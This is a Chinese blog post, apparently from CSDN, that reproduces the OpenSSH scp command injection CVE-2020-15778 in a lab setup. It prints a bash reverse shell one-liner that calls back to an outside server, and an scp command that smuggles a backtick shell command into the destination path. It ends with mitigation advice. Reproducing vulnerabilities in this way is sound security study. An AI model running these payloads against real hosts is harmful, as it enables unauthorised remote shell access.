centos7输入shell找不到命令_CVE202015778 OpensshSCP 命令注入漏洞复现

刚刚好这几遇见了不少OPENSSH命中该漏洞版本的就复现一下。

本文参考字节脉搏等 字节脉搏EXP调用失败可能为环境问题。

感谢福林表哥提供第二个exp 反弹shell成功。

01漏洞介绍

CVE编号:CVE-2020-15778

发布时间:2020-07-24

危害等级:高危

漏洞版本:<= openssh-8.3p1

漏洞描述:OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。

参考链接来自CNNVD

http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202007-1519

02环境准备

一台centos7  一台kali  一台公网vps (反弹shell用)

b70a0f8cbd3650d7ffb44eb1a8c0104d.png

03复现开始

 测试scp是否能连上 编写一个txt 然后连接环境

94a7102ebe101e5ffcf79a1d145a5dcd.png

scp 1.txt root@IP:/tmp/1.txt  | 测试传到tmp下1.txt 测试成功

35d7964389c24749b1bbc139403436ce.png

2b22349e8da580f186a4cf36e78406cf.png

编写反弹shell 语句 最简单的

bash -i >& /dev/tcp/IP/端口 0>&1

服务器监听端口

150f56c1b76a52a4b8139be773712d2d.png

首先 需要给1.sh权限 直接777吧

4d6b6106340daab4e7f0076e4db9050c.png

然后首先需要把1.sh传上去 才可以进行下一步

d469ebf1ab4664a049563096d8b2e814.png

调用字节脉搏的exp 报错的异常 有点看不懂

scp 1.sh root@IP:/’`sh /tmp/1.sh`’

71f7cff2f463725e61b90014dc6f4d21.png

然后联系了一下福林表哥 换了一个exp 成功 由于不确定是否是公开的先隐藏把 

4da81b1d58af84e1d3cf48044f566847.png

看公网服务器的监听 反弹shell成功

cc8318e07f90bf9588d81eb9e32a38ab.png

04实验总结

个人看法 利用过于鸡肋 绕过拿到ssh密码了 一般是可以直连的,当然如果打CTF之类的比赛的话 当我没说 

05安全建议

官方尚未发布安全更新补丁密切关注厂商主页获取解决办法:

http://www.openssh.com/portable.html

如果对你有用 不如点个关注 转发一下文章

欢迎大佬们加好友吹水聊天

967cb2639714e1f4145e611884762629.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值